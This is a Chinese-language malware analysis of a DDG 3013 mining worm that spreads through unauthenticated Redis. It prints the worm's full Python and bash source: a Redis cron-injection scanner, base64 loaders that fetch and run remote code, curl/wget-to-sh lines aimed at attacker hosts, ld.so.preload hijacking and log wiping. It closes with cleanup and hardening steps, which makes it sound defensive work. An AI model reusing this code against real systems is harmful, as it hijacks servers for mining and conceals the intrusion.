DDG 3013 變種: 基於 Redis 未授權訪問的挖礦蠕蟲簡要分析
摘要:
前言
受限於缺乏針對 elf 檔案的分析能力,對一些邏輯的跟蹤仍有一定猜測成分,僅供參考。
正文
事情的起因
阿里雲主機提供了一些惡意命令執行告警,定位到如下命令
# 告警1
python -c import base64;...
前言
受限於缺乏針對 elf 檔案的分析能力,對一些邏輯的跟蹤仍有一定猜測成分,僅供參考。
正文
事情的起因
阿里雲主機提供了一些惡意命令執行告警,定位到如下命令
# 告警1
python -c import base64;exec(base64.b64decode('I2NvZGluZzogdXRmLTgKaW1wb3J0IHVybGxpYgppbXBvcnQgYmFzZTY0CgpkPSAnaHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L25ZQnB1QXhUJwp0cnk6CiAgICBwYWdlPWJhc2U2NC5iNjRkZWNvZGUodXJsbGliLnVybG9wZW4oZCkucmVhZCgpKQogICAgZXhlYyhwYWdlKQpleGNlcHQ6CiAgICBwYXNz'))
# 告警2
/bin/sh -c /bin/chmod 755 /usr/bin/curl && /usr/bin/curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh
嘗試跟蹤 告警1 和 告警2 的程式碼,涉及大量中間檔案(不過很多都只是base64一下),進行一些簡單的梳理後,發現比較重要的三個檔案。
1 https://pastebin.com/raw/nYBpuAxT (基於 Python 的擴散對 Redis 未授權訪問的利用) 2 https://pastebin.com/raw/Gw7mywhC (在 Linux 中新增各種 crontab, 劫持so, 儘可能保證持久駐留) 3 i.sh, (下發 ELF 挖礦檔案)
nYBpuAxT
蠕蟲式傳播, 最大執行緒數為 20 執行緒
獲取當前主機 IP, 據此構造出相關 B段 的IP 列表。
並掃描當前主機 (略大於)B段 (涉及 IP 數量是 655360 ) 的其他主機的 6379 埠。
關鍵攻擊載荷
使用 Redis 的備份配置檔案命令,將相關內容寫入 /var/spool/cron/root 檔案中。
藉此使用計劃任務執行命令, 其中 */1 * * * * 指的是每分鐘執行一次相關命令
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(2)
s.connect((self.host, 6379))
s.send('set backup1 "\\n\\n\\n*/1 * * * * curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\\n\\n\\n"\r\n')
s.send('set backup2 "\\n\\n\\n*/1 * * * * wget -q -O- https://pastebin.com/raw/xbY7p5Tb|sh\\n\\n\\n"\r\n')
s.send('config set dir /var/spool/cron\r\n')
s.send('config set dbfilename root\r\n')
s.send('save\r\n')
s.close()
原始完整檔案 https://pastebin.com/raw/nYBpuAxT
#! /usr/bin/env python
#coding: utf-8
import threading
import socket
from re import findall
import httplib
IP_LIST = []
class scanner(threading.Thread):
tlist = []
maxthreads = 20
evnt = threading.Event()
lck = threading.Lock()
def __init__(self,host):
threading.Thread.__init__(self)
self.host = host
def run(self):
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(2)
s.connect((self.host, 6379))
s.send('set backup1 "\\n\\n\\n*/1 * * * * curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\\n\\n\\n"\r\n')
s.send('set backup2 "\\n\\n\\n*/1 * * * * wget -q -O- https://pastebin.com/raw/xbY7p5Tb|sh\\n\\n\\n"\r\n')
s.send('config set dir /var/spool/cron\r\n')
s.send('config set dbfilename root\r\n')
s.send('save\r\n')
s.close()
except Exception as e:
pass
scanner.lck.acquire()
scanner.tlist.remove(self)
if len(scanner.tlist) < scanner.maxthreads:
scanner.evnt.set()
scanner.evnt.clear()
scanner.lck.release()
def newthread(host):
scanner.lck.acquire()
sc = scanner(host)
scanner.tlist.append(sc)
scanner.lck.release()
sc.start()
newthread = staticmethod(newthread)
def get_ip_list():
try:
url = 'ident.me'
conn = httplib.HTTPConnection(url, port=80, timeout=10)
req = conn.request(method='GET', url='/', )
result = conn.getresponse()
ip2 = result.read()
ips2 = findall(r'\d+.\d+.', ip2)[0][:-2]
for u in range(0, 10):
ip_list1 = (ips2 + (str(u)) +'.')
for i in range(0, 256):
ip_list2 = (ip_list1 + (str(i)))
for g in range(0, 256):
IP_LIST.append(ip_list2 + '.' + (str(g)))
except Exception:
pass
def runPortscan():
get_ip_list()
for host in IP_LIST:
scanner.lck.acquire()
if len(scanner.tlist) >= scanner.maxthreads:
scanner.lck.release()
scanner.evnt.wait()
else:
scanner.lck.release()
scanner.newthread(host)
for t in scanner.tlist:
t.join()
if __name__ == "__main__":
runPortscan()
Gw7mywhC
核心流程如下
update=$( curl -fsSL --connect-timeout 120 https://pastebin.com/raw/TzBeq3AM )
if [ ${update}x = "update"x ];then
echocron
else
if [ ! -f "/tmp/.tmph" ]; then
rm -rf /tmp/.tmpg
python
fi
kills
downloadrun
echocron
system
top
sleep 10
port=$(netstat -anp | grep :13531 | wc -l)
if [ ${port} -eq 0 ];then
downloadrunxm
fi
echo 0>/var/spool/mail/root
echo 0>/var/log/wtmp
echo 0>/var/log/secure
echo 0>/var/log/cron
fi
首先檢查格元件是是否有更新,有更新就會執行echocron替換相應的落地檔案。
kills() 函式
1 殺死本木馬老版本的程序
2 刪除 grub deamon 和 disk_genius (也可能是偽裝的其他木馬)
3 殺死其他挖礦程式的程序
4 刪除其他挖礦程式的檔案
5 殺死啟用特定疑似挖礦埠的程序
downloadrun()函式 (無ELF分析能力,半猜測)
配置挖礦木馬的守護程序
echocron() 函式
寫入各種 crontab 目錄,便於復活。
system() 函式
下載挖礦木馬關鍵程式並執行。
https://pastebin.com/raw/Fj2YdETv 地址內容
# https://pastebin.com/raw/Fj2YdETv (curl -fsSL https://pastebin.com/raw/JNPewK6r || wget -q -O- https://pastebin.com/raw/JNPewK6r)|base64 -d|/bin/bash
top() 函式
以 so 檔案劫持 (/etc/ld.so.preload) 的方式執行挖礦木馬,是更隱蔽的執行方式。
詳細資料需要參考
如果只是想要覆蓋一個庫檔案的某些函式,但保留其餘的內容,可以將覆蓋庫檔名(.so 字尾檔案)儲存至 /etc/ld.so.preload 檔案中。這些覆蓋庫檔案會比標準庫檔案優先讀取,這通常用於緊急的
downloadrunxm() (無ELF分析能力,半猜測)
配置礦池相關的配置檔案 /bin/config.json
配置挖礦木馬的守護程序
原始完整檔案 https://pastebin.com/raw/Gw7mywhC
#!/bin/bash
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
function kills() {
pkill -f sourplum
pkill wnTKYg && pkill ddg* && rm -rf /tmp/ddg* && rm -rf /tmp/wnTKYg
rm -rf /boot/grub/deamon && rm -rf /boot/grub/disk_genius
rm -rf /tmp/*index_bak*
rm -rf /tmp/*httpd.conf*
rm -rf /tmp/*httpd.conf
rm -rf /tmp/a7b104c270
ps auxf|grep -v grep|grep "mine.moneropool.com"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:8080"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:3333"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "monerohash.com"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "/tmp/a7b104c270"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:6666"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:7777"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:443"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "stratum.f2pool.com:8888"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmrpool.eu" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmrig" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmrigDaemon" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmrigMiner" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "/var/tmp/java" | awk '{print $2}'|xargs kill -9
pkill -f biosetjenkins
pkill -f AnXqV.yam
pkill -f xmrigDaemon
pkill -f xmrigMiner
pkill -f xmrig
pkill -f Loopback
pkill -f apaceha
pkill -f cryptonight
pkill -f stratum
pkill -f mixnerdx
pkill -f performedl
pkill -f JnKihGjn
pkill -f irqba2anc1
pkill -f irqba5xnc1
pkill -f irqbnc1
pkill -f ir29xc1
pkill -f conns
pkill -f irqbalance
pkill -f crypto-pool
pkill -f minexmr
pkill -f XJnRj
pkill -f NXLAi
pkill -f BI5zj
pkill -f askdljlqw
pkill -f minerd
pkill -f minergate
pkill -f Guard.sh
pkill -f ysaydh
pkill -f bonns
pkill -f donns
pkill -f kxjd
pkill -f Duck.sh
pkill -f bonn.sh
pkill -f conn.sh
pkill -f kworker34
pkill -f kw.sh
pkill -f pro.sh
pkill -f polkitd
pkill -f acpid
pkill -f icb5o
pkill -f nopxi
pkill -f irqbalanc1
pkill -f minerd
pkill -f i586
pkill -f gddr
pkill -f mstxmr
pkill -f ddg.2011
pkill -f wnTKYg
pkill -f deamon
pkill -f disk_genius
pkill -f sourplum
pkill -f bashx
pkill -f bashg
pkill -f bashe
pkill -f bashf
pkill -f bashh
pkill -f XbashY
pkill -f libapache
rm -rf /tmp/httpd.conf
rm -rf /tmp/conn
rm -rf /tmp/root.sh /tmp/pools.txt /tmp/libapache /tmp/config.json /tmp/bashf /tmp/bashg /tmp/libapache
rm -rf /tmp/conns
rm -f /tmp/irq.sh
rm -f /tmp/irqbalanc1
rm -f /tmp/irq
rm -rf /tmp/kworkerds /bin/kworkerds /bin/config.json
netstat -anp | grep 69.28.55.86:443 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
netstat -anp | grep 185.71.65.238 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
netstat -anp | grep :3333 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
netstat -anp | grep :4444 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
netstat -anp | grep :5555 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
netstat -anp | grep :6666 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
netstat -anp | grep :7777 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
netstat -anp | grep :3347 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
netstat -anp | grep :14444 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
y=$(netstat -anp | grep kworkerds | wc -l)
if [ ${y} -eq 0 ];then
netstat -anp | grep :13531 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
fi
}
function system() {
if [ ! -f "/bin/httpdns" ]; then
curl -fsSL https://pastebin.com/raw/Fj2YdETv -o /bin/httpdns && chmod 755 /bin/httpdns
if [ ! -f "/bin/httpdns" ]; then
wgethttps://pastebin.com/raw/Fj2YdETv -O /bin/httpdns && chmod 755 /bin/httpdns
fi
if [ ! -f "/etc/crontab" ]; then
echo -e "0 1 * * * root /bin/httpdns" >> /etc/crontab
else
sed -i '$d' /etc/crontab && echo -e "0 1 * * * root /bin/httpdns" >> /etc/crontab
fi
fi
}
function top() {
mkdir -p /usr/local/lib/
if [ ! -f "/usr/local/lib/libntp.so" ]; then
curl -fsSL http://thyrsi.com/t6/365/1535595427x-1404817712.jpg -o /usr/local/lib/libntp.so && chmod 755 /usr/local/lib/libntp.so
if [ ! -f "/usr/local/lib/libntp.so" ]; then
wget http://thyrsi.com/t6/365/1535595427x-1404817712.jpg -O /usr/local/lib/libntp.so && chmod 755 /usr/local/lib/libntp.so
fi
fi
if [ ! -f "/etc/ld.so.preload" ]; then
echo /usr/local/lib/libntp.so > /etc/ld.so.preload
else
sed -i '$d' /etc/ld.so.preload && echo /usr/local/lib/libntp.so >> /etc/ld.so.preload
fi
touch -acmr /bin/sh /etc/ld.so.preload
touch -acmr /bin/sh /usr/local/lib/libntp.so
}
function python() {
nohup python -c "import base64;exec(base64.b64decode('I2NvZGluZzogdXRmLTgKaW1wb3J0IHVybGxpYgppbXBvcnQgYmFzZTY0CgpkPSAnaHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L2VSa3JTUWZFJwp0cnk6CiAgICBwYWdlPWJhc2U2NC5iNjRkZWNvZGUodXJsbGliLnVybG9wZW4oZCkucmVhZCgpKQogICAgZXhlYyhwYWdlKQpleGNlcHQ6CiAgICBwYXNz'))" >/dev/null 2>&1 &
touch /tmp/.tmph
}
function echocron() {
echo -e "*/10 * * * * root (curl -fsSL https://pastebin.com/raw/5bjpjvLP || wget -q -O- https://pastebin.com/raw/5bjpjvLP)|sh\n##" > /etc/cron.d/root
echo -e "*/17 * * * * root (curl -fsSL https://pastebin.com/raw/5bjpjvLP || wget -q -O- https://pastebin.com/raw/5bjpjvLP)|sh\n##" > /etc/cron.d/system
echo -e "*/23 * * * *(curl -fsSL https://pastebin.com/raw/5bjpjvLP || wget -q -O- https://pastebin.com/raw/5bjpjvLP)|sh\n##" > /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo -e "*/31 * * * *(curl -fsSL https://pastebin.com/raw/5bjpjvLP || wget -q -O- https://pastebin.com/raw/5bjpjvLP)|sh\n##" > /var/spool/cron/crontabs/root
mkdir -p /etc/cron.hourly
curl -fsSL https://pastebin.com/raw/5bjpjvLP -o /etc/cron.hourly/oanacron && chmod 755 /etc/cron.hourly/oanacron
if [ ! -f "/etc/cron.hourly/oanacron" ]; then
wget https://pastebin.com/raw/5bjpjvLP -O /etc/cron.hourly/oanacron && chmod 755 /etc/cron.hourly/oanacron
fi
mkdir -p /etc/cron.daily
curl -fsSL https://pastebin.com/raw/5bjpjvLP -o /etc/cron.daily/oanacron && chmod 755 /etc/cron.daily/oanacron
if [ ! -f "/etc/cron.daily/oanacron" ]; then
wget https://pastebin.com/raw/5bjpjvLP -O /etc/cron.daily/oanacron && chmod 755 /etc/cron.daily/oanacron
fi
mkdir -p /etc/cron.monthly
curl -fsSL https://pastebin.com/raw/5bjpjvLP -o /etc/cron.monthly/oanacron && chmod 755 /etc/cron.monthly/oanacron
if [ ! -f "/etc/cron.monthly/oanacron" ]; then
wget https://pastebin.com/raw/5bjpjvLP -O /etc/cron.monthly/oanacron && chmod 755 /etc/cron.monthly/oanacron
fi
touch -acmr /bin/sh /var/spool/cron/root
touch -acmr /bin/sh /var/spool/cron/crontabs/root
touch -acmr /bin/sh /etc/cron.d/system
touch -acmr /bin/sh /etc/cron.d/root
touch -acmr /bin/sh /etc/cron.hourly/oanacron
touch -acmr /bin/sh /etc/cron.daily/oanacron
touch -acmr /bin/sh /etc/cron.monthly/oanacron
}
function downloadrun() {
ps=$(netstat -anp | grep :13531 | wc -l)
if [ ${ps} -eq 0 ];then
if [ ! -f "/tmp/kworkerds" ]; then
curl -fsSL http://thyrsi.com/t6/358/1534495127x-1404764247.jpg -o /tmp/kworkerds && chmod 777 /tmp/kworkerds
if [ ! -f "/tmp/kworkerds" ]; then
wget http://thyrsi.com/t6/358/1534495127x-1404764247.jpg -O /tmp/kworkerds && chmod 777 /tmp/kworkerds
fi
nohup /tmp/kworkerds >/dev/null 2>&1 &
else
nohup /tmp/kworkerds >/dev/null 2>&1 &
fi
fi
}
function downloadrunxm() {
pm=$(netstat -anp | grep :13531 | wc -l)
if [ ${pm} -eq 0 ];then
if [ ! -f "/bin/config.json" ]; then
curl -fsSL http://thyrsi.com/t6/358/1534496022x-1404764583.jpg -o /bin/config.json && chmod 777 /bin/config.json
if [ ! -f "/bin/config.json" ]; then
wget http://thyrsi.com/t6/358/1534496022x-1404764583.jpg -O /bin/config.json && chmod 777 /bin/config.json
fi
fi
if [ ! -f "/bin/kworkerds" ]; then
curl -fsSL http://thyrsi.com/t6/358/1534491798x-1404764420.jpg -o /bin/kworkerds && chmod 777 /bin/kworkerds
if [ ! -f "/bin/kworkerds" ]; then
wget http://thyrsi.com/t6/358/1534491798x-1404764420.jpg -O /bin/kworkerds && chmod 777 /bin/kworkerds
fi
nohup /bin/kworkerds >/dev/null 2>&1 &
else
nohup /bin/kworkerds >/dev/null 2>&1 &
fi
fi
}
update=$( curl -fsSL --connect-timeout 120 https://pastebin.com/raw/TzBeq3AM )
if [ ${update}x = "update"x ];then
echocron
else
if [ ! -f "/tmp/.tmph" ]; then
rm -rf /tmp/.tmpg
python
fi
kills
downloadrun
echocron
system
top
sleep 10
port=$(netstat -anp | grep :13531 | wc -l)
if [ ${port} -eq 0 ];then
downloadrunxm
fi
echo 0>/var/spool/mail/root
echo 0>/var/log/wtmp
echo 0>/var/log/secure
echo 0>/var/log/cron
fi
#
#
#
i.sh
1 首先將自己寫入 /var/spool/cron/root 和 /var/spool/cron/crontabs/root, 保證不斷重複執行。
*/15 * * * *, 執行的頻率是每 15 分鐘一次。
2 根據系統架構,會下載對應的 ELF 挖礦木馬 ddgs.x86_64 或 ddgs.i686, 重新命名為 /tmp/ddgs.3013 並執行。
3 殺死其他競爭對手的程序。
原始檔案ofollow,noindex" target="_blank">http://149.56.106.215:8000/i.sh
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
echo "" > /var/spool/cron/root
echo "*/15 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/root
echo "*/15 * * * * wget -q -O- http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo "" > /var/spool/cron/crontabs/root
echo "*/15 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/crontabs/root
echo "*/15 * * * * wget -q -O- http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/crontabs/root
ps auxf | grep -v grep | grep /tmp/ddgs.3013 || rm -rf /tmp/ddgs.3013
if [ ! -f "/tmp/ddgs.3013" ]; then
wget -q http://149.56.106.215:8000/static/3013/ddgs.$(uname -m) -O /tmp/ddgs.3013
curl -fsSL http://149.56.106.215:8000/static/3013/ddgs.$(uname -m) -o /tmp/ddgs.3013
fi
chmod +x /tmp/ddgs.3013 && /tmp/ddgs.3013
ps auxf | grep -v grep | grep Circle_MI | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep get.bi-chi.com | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep hashvault.pro | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep nanopool.org | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep minexmr.com | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep /boot/efi/ | awk '{print $2}' | xargs kill
#ps auxf | grep -v grep | grep ddg.2006 | awk '{print $2}' | kill
#ps auxf | grep -v grep | grep ddg.2010 | awk '{print $2}' | kill
溯源相關資訊 config.json
涉及的惡意程式碼片段
wget http://thyrsi.com/t6/358/1534496022x-1404764583.jpg -O /bin/config.json && chmod +x /bin/config.json
config.json 內容如下
{
"algo": "cryptonight",
"api": {
"port": 0,
"access-token": null,
"worker-id": null,
"ipv6": false,
"restricted": true
},
"av": 0,
"background": false,
"colors": true,
"cpu-affinity": null,
"cpu-priority": null,
"donate-level": 0,
"huge-pages": true,
"hw-aes": null,
"log-file": null,
"max-cpu-usage": 100,
"pools": [
{
"url": "stratum+tcp://xmr.f2pool.com:13531",
"user": "47eCpELDZBiVoxDT1tBxCX7fFU4kcSTDLTW2FzYTuB1H3yzrKTtXLAVRsBWcsYpfQzfHjHKtQAJshNyTU88LwNY4Q3rHFYA.xmrig",
"pass": "x",
"rig-id": null,
"nicehash": false,
"keepalive": false,
"variant": 1
}
],
"print-time": 60,
"retries": 5,
"retry-pause": 5,
"safe": false,
"threads": null,
"user-agent": null,
"watch": false
}
總結
蠕蟲特點
值得注意的蠕蟲手段
1 利用 /etc/ld.so.preload 進行隱蔽感染
2 濫用合法的圖片上傳服務 http://thyrsi.com/t6/365/1535595427x-1404817712.jpg
3 使用 Pastebin 構建 可更新 的惡意軟體家族
應急響應方面的提示
1 測試一些清理方案時,可以在 虛擬機器/沙箱 中先進行嘗試。
2 Redis 未授權訪問漏洞存在時,攻擊者還很有可能通過寫 ssh登入金鑰 來進行遠端登陸操作。
3 此外,存在該漏洞的機器,還有很大可能性會被 刪庫勒索 , 可以參考阿里雲的OA==&mid=2664077507&idx=1&sn=b92c2b3972ca24e146d613a88a512ecd&chksm=84aaadb6b3dd24a0a34c2b431f0092464ca3c5edba91ca37e6cfd4db0e9018bb8a1fdc335d98&scene=0#rd" target="_blank" rel="nofollow,noindex">預警 - 刪庫跑路加勒索,Redis勒索事件爆發
清理方案
1 將 Redis 服務關閉,並設定密碼。
在 redis.conf 中找到 "requirepass" 欄位,在後面填上你需要的密碼,Redis 客戶端也需要使用此密碼來訪問 Redis 服務,之後重啟 Redis 服務,驗證密碼是否生效。
注意要使用強度較高的 Redis 密碼,因為該木馬也有簡單的爆破功能,以擴大傳播範圍。
2 清理定時任務 (先清理定時任務,再刪除挖礦病毒本體,防止再生)
# 包括但不限於 /etc/crontab /var/spool/cron/root /var/spool/cron/crontabs/root /etc/cron.d/system /etc/cron.d/root /etc/cron.hourly/oanacron /etc/cron.daily/oanacron /etc/cron.monthly/oanacron /etc/cron.monthly/oanacron
3 刪除相關動態連結庫
# 包括但不限於 /etc/ld.so.preload /etc/libjdk.so /usr/local/lib/md.so /usr/local/lib/screen.so /usr/local/lib/y.so
4 結束掉挖礦和 DDG 母體相關程序
ps -ef | grep -v grep | egrep 'wnTKYg|2t3ik|qW3xT.2|ddg|kworkerds' | awk '{print $2}' | xargs kill -9
5 然後刪除相應的惡意程式,主要在臨時目錄下。另外建議用 find/locate 再找一下如下關鍵字qW3xT, ddg*, wnTKYg, 2t3ik 等, 儘可能清理乾淨。
# 包括但不限於 /tmp/qW3xT /tmp/ddgs.3013 /tmp/ddgs.3012 /tmp/wnTKYg /tmp/2t3ik /tmp/kworkerds
參考資料
1 威脅快訊:DDG 3013 版本 - 360 Netlab
http://blog.netlab.360.com/a-fast-ddg-3013-analyze/2 DDG 挖礦最新變種分析報告 - 深信服
http://www.freebuf.com/articles/system/180385.html3 記錄阿里雲伺服器被minerd和kworkerds感染作祟
https://blog.csdn.net/lang363/article/details/823548304 記一次redis病毒分析筆記
https://www.cnblogs.com/mondol/p/9592056.html5 阿里雲 centos 伺服器 長期 cpu100%,無法通過top、ps等命令找出佔cpu程序?
https://www.zhihu.com/question/598203136 Linux 共享庫指南 # 庫檔案是怎樣被使用的
http://liaoph.com/linux-shared-libary/7 預警| 刪庫跑路加勒索,Redis勒索事件爆發
wechat_link